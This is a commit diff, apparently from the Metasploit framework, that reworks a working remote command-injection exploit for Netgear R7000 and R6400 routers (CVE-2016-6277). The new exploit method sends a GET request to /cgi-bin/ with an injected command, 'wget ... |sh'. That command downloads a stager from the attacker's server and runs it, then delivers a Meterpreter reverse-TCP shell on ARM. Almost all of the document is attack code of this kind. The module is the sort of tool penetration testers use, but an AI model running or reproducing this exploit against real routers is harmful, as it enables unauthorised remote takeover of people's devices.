Convert ARCH_CMD to CmdStager
parent
25b3cc685a
commit
0f899fdb0b
|
@ -6,9 +6,11 @@
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -18,11 +20,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
|
Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'unix',
|
'Platform' => 'linux',
|
||||||
'Author' => ['thecarterb', 'Acew0rm'],
|
'Author' => ['thecarterb', 'Acew0rm'],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'Privileged' => false,
|
'Privileged' => true,
|
||||||
'Arch' => [ARCH_CMD],
|
'Arch' => ARCH_ARMLE,
|
||||||
'Targets' => [
|
'Targets' => [
|
||||||
[ 'Automatic Target', { } ]
|
[ 'Automatic Target', { } ]
|
||||||
],
|
],
|
||||||
|
@ -35,19 +37,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
[ 'CVE', '2016-6277']
|
[ 'CVE', '2016-6277']
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Dec 06 2016',
|
'DisclosureDate' => 'Dec 06 2016',
|
||||||
'Payload' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'Space' => 1024,
|
'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
|
||||||
'DisableNops' => true,
|
}
|
||||||
'BadChars' => "\x20"
|
|
||||||
},
|
|
||||||
'DefaultOptions' => { 'WfsDelay' => 10}
|
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80)
|
Opt::RPORT(80)
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
|
deregister_options('URIPATH')
|
||||||
end
|
end
|
||||||
|
|
||||||
def scrape(text, start_trig, end_trig)
|
def scrape(text, start_trig, end_trig)
|
||||||
|
@ -80,24 +81,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
check
|
return if check == CheckCode::Safe
|
||||||
|
|
||||||
pe = payload.encoded
|
@cmdstager = generate_cmdstager(flavor: :wget).join(';')
|
||||||
pe.to_s
|
|
||||||
pe.gsub!('{','')
|
|
||||||
pe.gsub!('}','')
|
|
||||||
|
|
||||||
#cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
|
send_request_cgi(
|
||||||
#str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
|
'method' => 'GET',
|
||||||
|
'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
|
||||||
print_status('Sending encoded command...')
|
)
|
||||||
vprint_status("Encoded command: #{pe}")
|
end
|
||||||
send_request_cgi({
|
|
||||||
'uri' => "/cgi-bin/;#{pe}",
|
|
||||||
'method' => 'GET'
|
|
||||||
})
|
|
||||||
|
|
||||||
print_status('Giving the handler time to run...')
|
|
||||||
|
|
||||||
|
# Return CmdStager on first request, payload on second
|
||||||
|
def on_request_uri(cli, request)
|
||||||
|
if @cmdstager
|
||||||
|
send_response(cli, @cmdstager)
|
||||||
|
@cmdstager = nil
|
||||||
|
else
|
||||||
|
super
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# XXX: This is the only way to force this resource
|
||||||
|
def resource_uri
|
||||||
|
'/'
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
Loading…
Reference in New Issue